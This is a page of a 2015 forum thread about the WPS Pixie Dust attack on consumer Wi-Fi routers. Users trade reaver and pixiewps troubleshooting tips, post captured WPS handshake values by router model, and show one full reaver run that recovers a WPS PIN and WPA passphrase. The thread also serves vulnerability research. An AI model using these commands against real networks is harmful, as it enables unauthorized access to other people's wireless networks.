PDA

View Full Version : WPS Pixie Dust Attack (Offline WPS Attack)



Pages : 1 [2] 3

soxrok2212
2015-04-20, 21:39
I added a new Realtek video demo... "WPS Pixie Dust Attack: Automatic Ralink/Realtek/Broadcom" for those of you having trouble. Can't post youtube videos so you'll just have to search for it.

nuroo
2015-04-20, 21:50
I couldnt find the video yet, even under your name/channel. Probably not finished uploading.

Is the new pixiewps ready? with more realtek support?

soxrok2212
2015-04-20, 22:02
Not all the realtek support. It's still under development but the process will be the same. If it doesn't turn up a pin the first time you try it against Realtek, run it again. I had the problem in the video but didn't want to cut it cuz then people would think its fake.

Btw, I use pixiewps right from Wiire's github, not from the Kali repos.

nuroo
2015-04-20, 22:05
Nice video !!!

Greet work all involved.

soxrok2212
2015-04-20, 22:07
Nice video !!!

Greet work all involved.

Wiire is literally a genius. He is literally the key to most of the development. Kudos to him, and to all the others who've helped.

mmusket33
2015-04-21, 09:03
Pixie Dust Data Types and successful WPS pin extraction.

There are(2) two types of Pixie Dust Data Sequences:

When --dh-small is used in the reaver command line the -PKR sequence is fixed and not variable.

When --dh-small is not use the -PKR variable constantly changes.

Musket Teams have come across routers where --dh-small sequences did not provide the WPS Key while the same reaver command line without the --dh-small in the command line thus -PKR was variable, provided data that DID extract the WPS Key.

MTeams suggest that if you run a --dh-small attack and do not acquire the WPS key from the data, remove the --dh-small from the reaver command line, collect some more Pixie Dust data sequences with a variable -PKR and try again.


MTeams Labs

wiire
2015-04-21, 10:42
Pixie Dust Data Types and successful WPS pin extraction.
Musket Teams have come across routers where --dh-small sequences did not provide the WPS Key while the same reaver command line without the --dh-small in the command line thus -PKR was variable, provided data that DID extract the WPS Key.

I just want to point out that the tool is not completed yet, it works only (for Realtek) if the 3 nonces are generated within THE SAME second. So we can't be sure wether --dh-small cause bugs. I think you should try to supply the right pin with Reaver to the AP using --dh-small. If it works and the AP goes past the M3 then it should means that it works with --dh-small too (unless there's a bug in my code lol).

mmusket33
2015-04-21, 11:29
To wiire


Further PKR corrections when using --dh-small in the reaver command line

Musket Teams noticed that the PKR variable when --dh-small is employed in the reaver command line should normally be a long series of zeros ending with :02. Total string length is 575. However in all the output provided by the modded reaver, the PKR variable when dh-small is used show the 02 at the beginning of the string and the key is never found

MTeams moved the 02 to the end of the PKR String and the WPS key was immediately found.

In these cases if the key is not found then transpose the 02 to the end of the string when --dh-small is used OR remove --dh-small from the reaver command line and collect new data with a variable PKR.

Musket Teams Labs

wiire
2015-04-21, 13:49
To wiire


Further PKR corrections when using --dh-small in the reaver command line

Musket Teams noticed that the PKR variable when --dh-small is employed in the reaver command line should normally be a long series of zeros ending with :02. Total string length is 575. However in all the output provided by the modded reaver, the PKR variable when dh-small is used show the 02 at the beginning of the string and the key is never found

MTeams moved the 02 to the end of the PKR String and the WPS key was immediately found.

In these cases if the key is not found then transpose the 02 to the end of the string when --dh-small is used OR remove --dh-small from the reaver command line and collect new data with a variable PKR.

Musket Teams Labs

PKr gets printed in little-endian when using small keys (only). When adding the lines of code to print PKr I didn't test with -S, ops. If you sniff the traffic with Wireshark you see it's OK. BTW if you use pixiewps with small keys (-S) the program will automatically set PKr = 2 (00: ... :02).

That's beacuse with small keys Reaver sets its private number = 1. Thus: g^A mod P = 2^1 mod P = 2 (P is a huge prime number > 2).

Anyway now the recommended version of Reaver is the one made and mainteined by t6_x and datahead (https://github.com/t6x/reaver-wps-fork-t6x) (which prints it right). I updated the link to my original post.

wn722
2015-04-21, 14:48
uhm, anyone had any luck with atheros chipsets yet?

soxrok2212
2015-04-21, 14:54
uhm, anyone had any luck with atheros chipsets yet?

I talked with Dominique, he said Atheros seemed pretty secure. I haven't looked into it much yet to be honest... maybe in the future. We need a lot of data to analyze to see if we find any similar hashes.. etc.

Saydamination
2015-04-21, 16:57
I talked with Dominique, he said Atheros seemed pretty secure. I haven't looked into it much yet to be honest... maybe in the future. We need a lot of data to analyze to see if we find any similar hashes.. etc.

Hi soxrox ,

I have a few TP LiNK RTL 8671 EV 2006 07 27 Realtek chipset modem information ( modem pictures, eap-eapol cap files )

I can send you ... Maybe you can use for analyz...

TPLiNK uses generaly this chipset...

send me an email...

thanks..

soxrok2212
2015-04-21, 17:06
Hi soxrox ,

I have a few TP LiNK RTL 8671 EV 2006 07 27 Realtek chipset modem information ( modem pictures, eap-eapol cap files )

I can send you ... Maybe you can use for analyz...

TPLiNK uses generaly this chipset...

send me an email...

thanks..

My e-mail is my username @gmail.com :D

someone_else
2015-04-21, 17:59
some updates for the database ;-)


Compal CH6640E
Realtek RTL8192CE
After successful PIN-Test reaver brings for PSK + SSID "(null)" ?
So, what else, its some kind of VULNERABLE ;).


[P] E-Nonce: 07:ee:41:56:16:0a:54:d7:0d:c7:1e:a9:43:83:c1:a0
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: c6:5a:4c:48:87:b9:24:fb:b3:f8:0f:de:b4:4c:cc:82:23 :cf:6c:55:2b:4c:d8:a3:a8:c8:a8:da:aa:ba:28:ab:c8:9 5:d1:aa:04:a2:10:f8:01:31:62:40:46:e0:cc:a8:6c:07: 9a:8c:5f:5c:1e:c5:13:53:c7:69:cc:55:ce:0a:de:38:27 :a1:9c:75:e5:09:e9:55:71:5e:60:3d:e7:a4:6f:88:60:4 e:da:8e:de:c3:74:48:fb:ad:8a:16:77:2b:0d:4f:d6:cc: 5d:85:0e:59:44:a9:de:3f:85:a1:49:80:ec:88:79:b2:4e :00:8a:6b:a5:db:27:62:3c:59:d8:e9:8f:f4:3e:09:76:7 4:5f:10:99:d1:33:39:69:a7:c6:2a:aa:60:29:1b:9c:5f: 4f:d4:b2:a2:08:cd:67:d0:de:59:12:be:24:9e:69:6e:f0 :a7:6b:70:2d:4f:db:5a:b5:cb:36:2b:44:4a:c7:e0:42:5 0:a8:6c:d4:a5:da:e4:46:51
[P] AuthKey: a1:3d:2a:8b:ce:3a:27:e2:09:11:f8:63:e4:95:c1:c9:18 :0e:2a:9b:fa:f1:06:b4:88:a0:d4:63:98:04:44:f5
[P] E-Hash1: 5c:b7:48:b9:b2:cc:1f:5b:17:5b:f3:c6:ce:ca:83:c1:9e :c2:08:f6:bf:35:de:3f:cd:0f:34:80:b9:6e:16:51
[P] E-Hash2: 45:2a:e1:1e:2e:f7:c9:9d:a2:7a:c3:d8:c0:02:0e:aa:2d :f8:18:2d:28:61:78:93:bd:e2:a2:09:31:f3:f5:1e


NOT VULNERABLE:

TP-LINK TL-WR740n v1/v2
Broadcom BCM5356


[P] E-Nonce: 28:68:6d:cf:7d:d7:09:e4:72:3b:c3:51:be:27:a6:16
[P] PKE: 85:c2:b7:ed:9a:a8:04:39:8e:7e:cd:1c:f3:c3:df:e6:7e :07:91:cc:80:98:56:38:8d:e1:b7:42:57:7f:62:e2:a0:3 9:8f:e3:84:48:ce:10:87:66:a7:5b:91:d2:b5:8e:ec:cb: 4c:8c:96:5a:c7:66:11:61:e5:78:42:55:3a:65:8d:ef:b1 :d2:69:e7:ce:06:a3:b4:36:bd:c1:e9:2c:e8:46:2d:44:e 3:93:66:c6:48:85:a0:ac:14:ee:11:b7:76:68:61:0a:ef: be:ed:a3:19:31:70:68:c2:fb:eb:65:c6:44:6a:02:d6:fb :25:8e:6a:10:2f:38:8a:a5:a6:de:c3:69:f9:b0:2b:0a:2 b:ce:12:a8:4f:b6:dc:be:48:c0:d7:28:08:d8:4d:10:e7: 89:9b:15:54:10:d3:a0:25:d1:da:7c:48:2d:22:87:e1:8d :2b:2b:f6:0f:3f:ab:14:3e:8d:ab:c5:5a:b8:8b:4a:a4:6 0:38:6b:dd:66:25:c1:ca:1e
[P] PKR: 2e:56:24:ad:1d:7e:77:0f:a8:b9:fd:6b:4b:9b:ed:38:23 :e7:44:c8:72:ef:ea:5e:57:bd:6a:a4:05:31:8b:70:81:3 0:03:80:cb:83:f5:ba:81:68:69:b1:cb:cf:d1:d4:86:8d: d0:25:1c:0d:03:b1:8f:47:4e:1b:3f:01:ec:62:c2:51:e4 :6a:54:59:96:e0:7c:72:0a:bf:64:2d:de:cf:d8:49:f5:c a:ae:88:5a:d1:ff:9f:ac:ff:32:9a:fb:33:64:fa:2f:44: 93:aa:56:64:e4:9d:41:3e:3a:44:99:53:1d:f6:b3:b4:82 :94:fa:dc:aa:a1:56:61:0b:d5:80:48:e3:5d:53:d2:36:f b:6f:85:8a:9c:08:af:62:1a:0b:ea:23:70:b3:63:0a:ea: 4f:3e:62:7c:5d:ba:11:2d:41:9c:4f:3e:18:2c:fd:94:11 :ad:a3:8c:c9:75:11:da:a3:ee:62:84:36:03:fc:bd:a5:b 5:b3:0e:73:81:4b:61:7d:3f
[P] AuthKey: cc:e9:3a:92:e6:1c:dd:a2:ab:92:d7:f3:13:a0:d3:67:92 :cd:75:7b:19:f6:9a:44:18:77:e6:17:ee:5c:33:3a
[P] E-Hash1: 83:90:f2:7e:17:5d:44:c4:38:c3:4e:cb:bc:80:92:0d:77 :b3:40:97:35:d5:9b:9a:da:a4:10:49:1b:b4:0f:07
[P] E-Hash2: e2:c2:90:1e:c2:21:ac:c4:4e:48:b6:4a:d9:cc:67:b1:e1 :67:7e:01:5e:af:33:53:40:fc:07:2a:ef:a1:d5:29


NOT VULNERABLE:

Belkin F7D1301 v1
Broadcom BCM5356A1


[P] E-Nonce: 84:87:88:e4:b0:9c:15:6c:20:cc:36:58:40:7c:83:6d
[P] PKE: 17:17:85:b8:2d:a4:54:d8:55:85:e2:0e:78:f2:94:56:29 :b4:d8:d6:f8:d6:9b:43:1c:d8:b5:c7:49:dd:e6:43:d9:4 3:f8:bb:8a:aa:54:94:b8:01:7f:67:81:95:92:c1:9d:f6: 4f:9c:0a:db:83:b4:23:2f:b6:61:7d:01:67:8f:10:30:94 :e7:d7:f5:db:bd:ea:44:cb:92:ec:00:a3:02:73:c5:5b:c 7:13:e0:88:a0:49:af:7a:15:55:69:ba:06:aa:b4:49:a5: 10:f7:1d:cc:b6:ad:f5:09:05:77:05:10:5e:3b:5a:a9:83 :98:0f:d8:0b:76:d0:db:4f:1e:e7:0d:81:7b:37:23:bb:9 f:1b:c5:13:ad:98:fc:af:29:bf:91:6a:ef:1d:ef:f4:74: 29:b7:de:8f:9d:8c:a4:4f:dc:98:90:26:13:30:3b:9e:db :d6:bd:b7:25:a3:0e:31:69:ab:e7:bb:bd:b5:48:9d:c6:a a:a0:95:b3:9f:10:02:e3:a0
[P] AuthKey: a6:27:f5:13:be:0c:41:cc:24:1c:c3:a7:c7:99:20:48:c9 :dd:b0:51:82:a0:51:29:2b:7b:2e:18:8b:76:fc:24
[P] E-Hash1: c4:0d:69:f7:ca:eb:50:5e:e9:84:8f:ab:0b:21:2b:5c:fa :90:21:f6:a2:98:9a:ef:ef:12:a5:5e:3c:d3:61:a4
[P] E-Hash2: 86:94:0c:25:ea:ac:32:15:7a:71:2a:66:50:b3:e7:3a:c6 :3d:02:1a:7a:4f:74:71:87:f3:df:54:ba:b4:21:98

NOT VULNERABLE:

ASUS RT-AC66U
Broadcom BCM4706


[P] E-Nonce: cf:93:1f:a3:6e:ac:6d:76:45:54:a3:06:cc:2d:36:2b
[P] PKE: 24:b3:71:23:bb:44:69:98:6a:d5:a6:e4:99:a5:5f:6d:c6 :75:e6:87:6e:50:ca:b6:88:13:c7:a3:b3:1f:5b:66:16:7 0:ee:a8:1a:33:08:0c:e9:98:28:cf:6d:54:d3:f9:52:73: 5d:7a:10:0c:84:9c:81:74:2e:ec:85:d9:be:d6:75:49:bf :78:d9:a0:da:86:1b:9a:50:a4:5f:ea:f8:fc:68:b8:a4:a 3:9c:bc:87:92:a4:a1:17:8f:00:76:39:9a:d5:33:01:41: 86:7d:e5:83:ca:06:6d:6c:a7:ae:10:94:55:fb:74:23:e1 :7a:d3:35:e5:62:1d:4c:c4:e6:cf:47:ff:ea:1d:b3:ce:0 3:b7:32:42:f7:c7:bb:bc:eb:94:03:71:86:04:63:6f:b2: 97:36:40:b1:3b:b1:80:25:5c:70:90:79:a7:4e:3f:c4:b8 :ad:e5:8c:ff:c7:65:a6:3a:95:fc:40:6a:8a:f9:80:ef:1 8:6b:d4:6d:40:6e:e3:ae:2a
[P] PKR: 23:3a:61:72:e4:59:9f:bd:f4:70:b6:5a:e9:6b:d4:e2:28 :14:ed:ca:38:89:c0:4e:77:b6:22:78:3d:74:99:fe:cd:5 2:d6:e1:ea:14:06:2e:86:f4:9b:77:4c:0e:a9:b3:06:56: 0b:4a:11:d1:46:4c:62:b6:56:cf:61:98:2d:e7:95:3a:1e :01:e5:b0:50:12:a0:36:c5:4a:e1:d1:68:50:8a:c3:f5:d e:5a:2b:ce:82:62:41:81:6a:a2:9b:0f:14:63:b1:0b:f0: db:82:19:2f:5a:6a:a5:b2:9d:cd:f1:36:fb:e6:ad:13:77 :79:bf:77:80:b3:72:6e:d7:76:62:dc:1d:ca:81:a1:f8:f 3:56:c7:f1:92:59:70:ca:db:2c:43:16:db:ea:a6:3a:40: 6f:59:9c:b8:3e:db:e6:21:11:21:38:9e:d8:2c:e0:df:85 :40:4d:4e:a7:93:e3:ee:eb:f8:25:c9:98:c0:e8:49:8b:6 e:b3:c4:1a:f9:72:18:a4:53
[P] AuthKey: 64:9b:23:3a:c5:4d:84:1b:9d:8d:ef:49:64:d4:02:de:7d :b0:73:7b:c1:28:61:69:7f:a1:0e:b6:11:59:1c:d6
[P] E-Hash1: 45:32:81:a0:27:f4:2e:b5:e7:31:27:79:ed:ae:0c:d7:a9 :22:66:9f:43:8d:07:a0:a4:23:03:55:c6:e7:ea:d3
[P] E-Hash2: d1:5a:cd:32:79:52:73:4a:d5:83:96:1b:59:9b:76:5f:d3 :5f:77:d8:1a:d8:86:7e:d9:d3:46:03:f2:b7:1b:3d

soxrok2212
2015-04-21, 22:34
Sweet thanks! Just updated everything.. should be all set :D

SubZero5
2015-04-21, 23:45
Not vulnerable:

ZyXEL VMG3312-B10A
[P] WPS Manufacturer: ZyXEL
[P] WPS Model Number: VMG3312-B10A
[P] WPS Model Serial Number: 96368GW


[P] E-Nonce: 10:74:5a:93:5d:0c:e9:38:fb:27:0d:2c:44:6a:47:aa
[P] PKE: bf:ce:38:9a:76:34:e7:62:2a:09:72:5d:12:04:e0:1b:c3 :94:1b:38:d5:6f:9b:bc:1e:fe:48:17:26:62:6f:27:b1:5 3:50:e1:d7:0d:65:09:30:90:4f:fd:80:4c:eb:c5:5b:9c: f8:c6:e0:66:79:10:72:91:32:e6:a5:93:ce:90:3b:5c:c3 :8c:be:97:fd:a3:ca:65:44:98:fc:5b:92:ae:ca:dd:56:4 2:d0:72:dc:66:1c:89:c6:9d:d1:07:0a:40:dc:88:76:60: c5:55:20:75:d6:83:5a:19:37:e9:9f:df:35:72:66:b7:ca :94:e3:cd:75:30:2a:27:dc:03:97:fa:3b:a3:3d:52:3f:4 a:47:f5:07:76:02:d9:68:a2:41:5f:5a:04:2c:00:74:c5: e5:8a:a8:ea:c3:f0:c3:af:d8:a4:fa:8a:70:5c:9d:48:b2 :e3:f4:2e:57:7c:a3:23:0f:88:c7:10:4b:cf:6e:aa:1e:c c:65:92:f6:30:16:dd:76:db
[P] PKR: d6:35:6a:d5:96:cb:22:1f:dc:8e:3e:36:98:81:3c:26:f4 :73:27:7c:00:f4:0a:0f:4d:5e:ff:e0:3f:a7:24:d1:6e:3 9:00:7e:65:cd:f6:10:f9:63:4a:47:54:a2:83:f0:4b:4d: 61:8a:6b:0f:f6:3c:c9:fb:30:b7:d5:6a:cd:60:6a:26:37 :e1:19:d9:e1:a4:62:44:c9:05:8c:65:04:d5:9f:e0:04:0 6:5e:5f:2d:1d:01:42:69:c7:a2:01:76:c0:71:87:6d:f0: 11:36:e4:9c:6c:61:0f:5a:82:06:e7:f8:b8:f0:f5:3a:5f :6b:ad:6e:7b:a2:73:b5:a3:b3:45:9e:b4:17:c9:4b:4f:0 3:25:ea:a5:9d:ff:85:6c:15:53:b1:58:7a:c2:c6:fb:b1: 96:34:44:9a:c7:38:e4:99:b4:27:7c:12:90:84:a4:94:4f :d9:79:df:2d:44:7e:8d:98:e0:1f:bf:42:19:a2:53:ee:8 c:39:d5:57:e4:85:b2:09:e2
[P] AuthKey: 75:2f:50:4b:1f:e5:69:92:8d:f5:9e:3f:6c:29:47:7e:87 :0d:2d:6e:ba:71:c8:ae:23:00:e7:ff:f7:a5:d0:94
[P] E-Hash1: 30:b0:f8:c1:d0:ae:d1:72:bc:65:46:65:94:a3:8d:09:47 :82:78:ed:bd:2e:db:b8:49:4a:7e:19:7d:e7:8f:05
[P] E-Hash2: 5e:b9:8b:28:34:79:09:d5:b5:99:48:34:14:78:3c:ea:f2 :ef:0a:a2:ac:c4:5a:97:1e:a7:41:4d:6e:36:5c:e3

soxrok2212
2015-04-22, 00:24
ZyXEL VMG3312-B10A
[P] WPS Manufacturer: ZyXEL
[P] WPS Model Number: VMG3312-B10A
[P] WPS Model Serial Number: 96368GW


Awesome thanks

Saydamination
2015-04-22, 10:44
My e-mail is my username @gmail.com :D

Hi soxrok ,

I sent an e-mail ...

good luck :)

someone_else
2015-04-22, 19:56
@ soxrok

please update the Chipset from Hitron CVE30360. The correct one is RT 3352F :confused:

And a new one for the Database:

NOT VULNERABLE:

TP-LINK TL-WDR3500
Atheros AR9340 / 2.4GHz
Atheros AR9300 / 5GHz


[P] E-Nonce: 1f:e5:c5:65:01:98:8c:c8:af:d5:40:33:5e:65:bc:8c
[P] PKE: 32:37:af:a7:a7:a7:f4:48:cb:31:a2:8c:c5:7b:50:68:be :a1:04:cc:28:5d:56:2c:e3:9b:c1:52:99:7e:b7:26:7b:0 e:0b:d1:c2:57:22:1f:53:88:4d:79:98:8d:44:5e:3a:65: 9b:e3:36:cc:3a:10:57:af:f4:f0:db:c1:02:14:0c:57:31 :23:26:27:9c:c2:b3:7e:fd:8c:f1:ff:8c:a9:f9:04:2d:0 a:46:09:c6:3b:97:75:04:8c:57:16:34:2e:4e:ef:01:12: e6:cc:e2:12:86:6b:a5:26:78:7b:23:73:6f:96:5f:03:8f :fb:c8:73:ab:5d:0f:dd:e4:58:91:c2:30:f5:84:a8:fe:3 9:eb:88:4e:e9:c0:5e:f4:3c:a2:60:8a:cc:40:8f:b1:1c: 9c:bd:49:51:18:9e:93:54:70:e5:20:8d:85:0d:4f:66:fe :2f:7a:e3:c4:84:15:39:18:4d:8f:35:83:1f:e7:23:e5:4 a:f7:34:7e:da:36:0f:21:8f
[P] PKR: 48:58:5f:0a:01:9a:e1:ac:8f:0c:e8:9e:c4:16:9b:c7:0c :03:02:f9:29:fb:2e:a3:6a:39:d1:87:76:e2:b5:fc:dc:4 4:e2:72:31:f2:75:42:af:13:33:ce:6d:a8:e0:87:2d:2f: ee:fa:27:6a:1c:0f:e7:4d:de:73:42:e8:b0:43:44:72:4b :f2:86:c9:f7:8d:47:fe:80:30:35:5a:5c:44:f7:a9:5d:4 1:66:79:2c:7b:2a:b8:e9:f4:a5:29:93:48:f7:57:e8:f2: fc:02:ba:6a:8b:dc:89:a5:32:f1:eb:a6:b2:64:83:c4:5a :b5:a3:96:c0:ab:25:ec:f7:2e:e2:7e:71:bd:36:c7:d0:1 5:89:4c:b9:e9:20:d9:23:67:c4:d4:03:5c:29:74:72:a0: c8:57:b4:8d:1e:15:c9:3e:75:84:8f:cb:c4:3a:f2:ed:fc :2e:d7:a6:31:c7:4c:01:d2:cd:ad:7a:2b:ef:4a:1c:b1:e 7:44:dd:7d:77:5a:99:06:7b
[P] AuthKey: 01:ff:58:b8:ea:a8:d9:e1:a0:f0:7f:31:93:9b:d2:c8:0b :c8:98:35:72:16:4b:da:29:98:e2:bd:04:9c:37:10
[P] E-Hash1: 27:7d:37:15:b0:ca:7c:dd:45:56:0f:a9:83:26:fa:a8:85 :74:9c:44:99:77:d2:a3:99:26:e0:33:8b:be:86:a3
[P] E-Hash2: 51:d0:4c:00:a2:b2:bc:01:dd:6f:d9:4c:32:76:33:3e:82 :cc:72:14:e8:a0:b9:64:30:36:df:2c:95:e9:83:1f

soxrok2212
2015-04-22, 20:19
@ soxrok

please update the Chipset from Hitron CVE30360. The correct one is RT 3352F :confused:

And a new one for the Database:

NOT VULNERABLE:

TP-LINK TL-WDR3500
Atheros AR9340 / 2.4GHz
Atheros AR9300 / 5GHz


[P] E-Nonce: 1f:e5:c5:65:01:98:8c:c8:af:d5:40:33:5e:65:bc:8c
[P] PKE: 32:37:af:a7:a7:a7:f4:48:cb:31:a2:8c:c5:7b:50:68:be :a1:04:cc:28:5d:56:2c:e3:9b:c1:52:99:7e:b7:26:7b:0 e:0b:d1:c2:57:22:1f:53:88:4d:79:98:8d:44:5e:3a:65: 9b:e3:36:cc:3a:10:57:af:f4:f0:db:c1:02:14:0c:57:31 :23:26:27:9c:c2:b3:7e:fd:8c:f1:ff:8c:a9:f9:04:2d:0 a:46:09:c6:3b:97:75:04:8c:57:16:34:2e:4e:ef:01:12: e6:cc:e2:12:86:6b:a5:26:78:7b:23:73:6f:96:5f:03:8f :fb:c8:73:ab:5d:0f:dd:e4:58:91:c2:30:f5:84:a8:fe:3 9:eb:88:4e:e9:c0:5e:f4:3c:a2:60:8a:cc:40:8f:b1:1c: 9c:bd:49:51:18:9e:93:54:70:e5:20:8d:85:0d:4f:66:fe :2f:7a:e3:c4:84:15:39:18:4d:8f:35:83:1f:e7:23:e5:4 a:f7:34:7e:da:36:0f:21:8f
[P] PKR: 48:58:5f:0a:01:9a:e1:ac:8f:0c:e8:9e:c4:16:9b:c7:0c :03:02:f9:29:fb:2e:a3:6a:39:d1:87:76:e2:b5:fc:dc:4 4:e2:72:31:f2:75:42:af:13:33:ce:6d:a8:e0:87:2d:2f: ee:fa:27:6a:1c:0f:e7:4d:de:73:42:e8:b0:43:44:72:4b :f2:86:c9:f7:8d:47:fe:80:30:35:5a:5c:44:f7:a9:5d:4 1:66:79:2c:7b:2a:b8:e9:f4:a5:29:93:48:f7:57:e8:f2: fc:02:ba:6a:8b:dc:89:a5:32:f1:eb:a6:b2:64:83:c4:5a :b5:a3:96:c0:ab:25:ec:f7:2e:e2:7e:71:bd:36:c7:d0:1 5:89:4c:b9:e9:20:d9:23:67:c4:d4:03:5c:29:74:72:a0: c8:57:b4:8d:1e:15:c9:3e:75:84:8f:cb:c4:3a:f2:ed:fc :2e:d7:a6:31:c7:4c:01:d2:cd:ad:7a:2b:ef:4a:1c:b1:e 7:44:dd:7d:77:5a:99:06:7b
[P] AuthKey: 01:ff:58:b8:ea:a8:d9:e1:a0:f0:7f:31:93:9b:d2:c8:0b :c8:98:35:72:16:4b:da:29:98:e2:bd:04:9c:37:10
[P] E-Hash1: 27:7d:37:15:b0:ca:7c:dd:45:56:0f:a9:83:26:fa:a8:85 :74:9c:44:99:77:d2:a3:99:26:e0:33:8b:be:86:a3
[P] E-Hash2: 51:d0:4c:00:a2:b2:bc:01:dd:6f:d9:4c:32:76:33:3e:82 :cc:72:14:e8:a0:b9:64:30:36:df:2c:95:e9:83:1f


Whoops... thanks!

aboulatif
2015-04-22, 20:33
hi soxrok2212 what about technicolor TD5130? is there any method to crack it

iliass
2015-04-22, 23:02
your news version it works in TD5130 v 2 ..but TD5130 V 1 no a will wait a new video for all chipset realtekk

lovemyth
2015-04-23, 12:38
I am not success with this AP, Do you need me gather more any infomation ?

http://i301.photobucket.com/albums/nn70/thelovemyth/info.png

DeEqualsDos
2015-04-24, 10:22
Doesnt work in uk talktalk super router
broadcam chipset huawei model

unsuns06
2015-04-24, 15:45
I confirm it's working on Technicolor TD5130 v2... :


wifislax ~ # reaver -i mon0 -b A6:25:89:XX:XX:XX -c 1 -K 3 -P

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from A6:25:89:XX:XX:XX
[+] Associated with A6:25:89:XX:XX:XX (ESSID: TNCAPxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] E-Nonce: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2010-09-20
[P] Access Point Serial Number: 123456789012347
[P] PKR: 44:7c:98:9e:94:47:e5:bc:22:0e:4f:b9:19:86:18:3a:35 :e9:70:8c:6d:97:a3:81:53:08:1b:22:4c:4a:fd:0a:2a:a 0:b9:37:de:31:86:2f:63:a1:2c:75:35:10:d9:2b:e3:8f: b7:6b:57:c9:58:fd:e8:0e:bf:87:44:08:23:84:ca:85:ec :2d:53:f3:27:cd:d5:a5:e7:93:9f:3a:7a:66:d3:c4:f1:e b:d4:e9:6c:60:ce:63:12:bc:ac:04:1e:ca:fd:ab:cf:b0: a4:d3:ad:39:f5:bd:1e:b2:c1:93:34:9d:b7:8b:cc:98:c9 :3e:90:d6:08:c0:08:18:51:d3:ff:5f:6a:a5:32:a5:d3:5 f:7d:48:bb:4f:f1:bc:eb:ac:95:22:8f:da:e3:a2:46:b9: 52:3c:ff:95:db:95:a9:0c:28:30:f8:68:97:9a:a7:66:02 :9c:11:da:ab:3d:7d:b7:30:ab:a8:69:c5:07:f5:da:da:e 3:3b:36:7e:f0:97:80:7b:27
[P] AuthKey: 04:b8:0b:ef:4b:f1:12:76:23:39:2d:f6:32:bb:c3:57:15 :45:17:c9:46:e3:a0:3b:44:80:2e:83:16:d8:1e:22
[P] E-Hash1: e6:0e:1b:5f:e2:f1:bc:eb:1e:f7:c4:1d:69:97:3a:ea:3b :81:25:aa:64:4a:23:11:cb:cd:52:8e:c3:78:39:9a
[P] E-Hash2: b9:f4:db:b2:08:1b:31:43:6e:70:9f:ca:cb:4d:bb:5d:0a :fc:86:5b:a4:76:33:e6:e0:cd:1b:b9:05:2f:d1:ce
[Pixie-Dust]
[Pixie-Dust] ES-1: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
[Pixie-Dust] ES-2: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
[Pixie-Dust] PSK1: 49:40:f7:f2:af:67:5a:50:81:12:b6:27:82:2f:35:3b
[Pixie-Dust] PSK2: d7:c0:5c:8d:60:9a:a6:cc:c0:fe:9e:6c:36:77:04:84
[Pixie-Dust] [+] WPS pin: 99280710
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i mon0 -b A6:25:89:XX:XX:XX -c 1 -s y -p 99280710

[Reaver Test] BSSID: A6:25:89:XX:XX:XX
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '99280710'
[Reaver Test] [+] WPA PSK: '18D189E728'
[Reaver Test] [+] AP SSID: 'TNCAPxxxxxx'

..But not on TD5130 v1 :


wifislax ~ # reaver -i mon0 -b 00:18:E7:XX:XX:XX -c 1 -K 3 -P

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from 00:18:E7:XX:XX:XX
[+] Associated with 00:18:E7:XX:XX:XX (ESSID: TNCAPxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] E-Nonce: 55:b3:65:81:7c:d3:2a:9b:72:bf:d2:23:58:93:d9:88
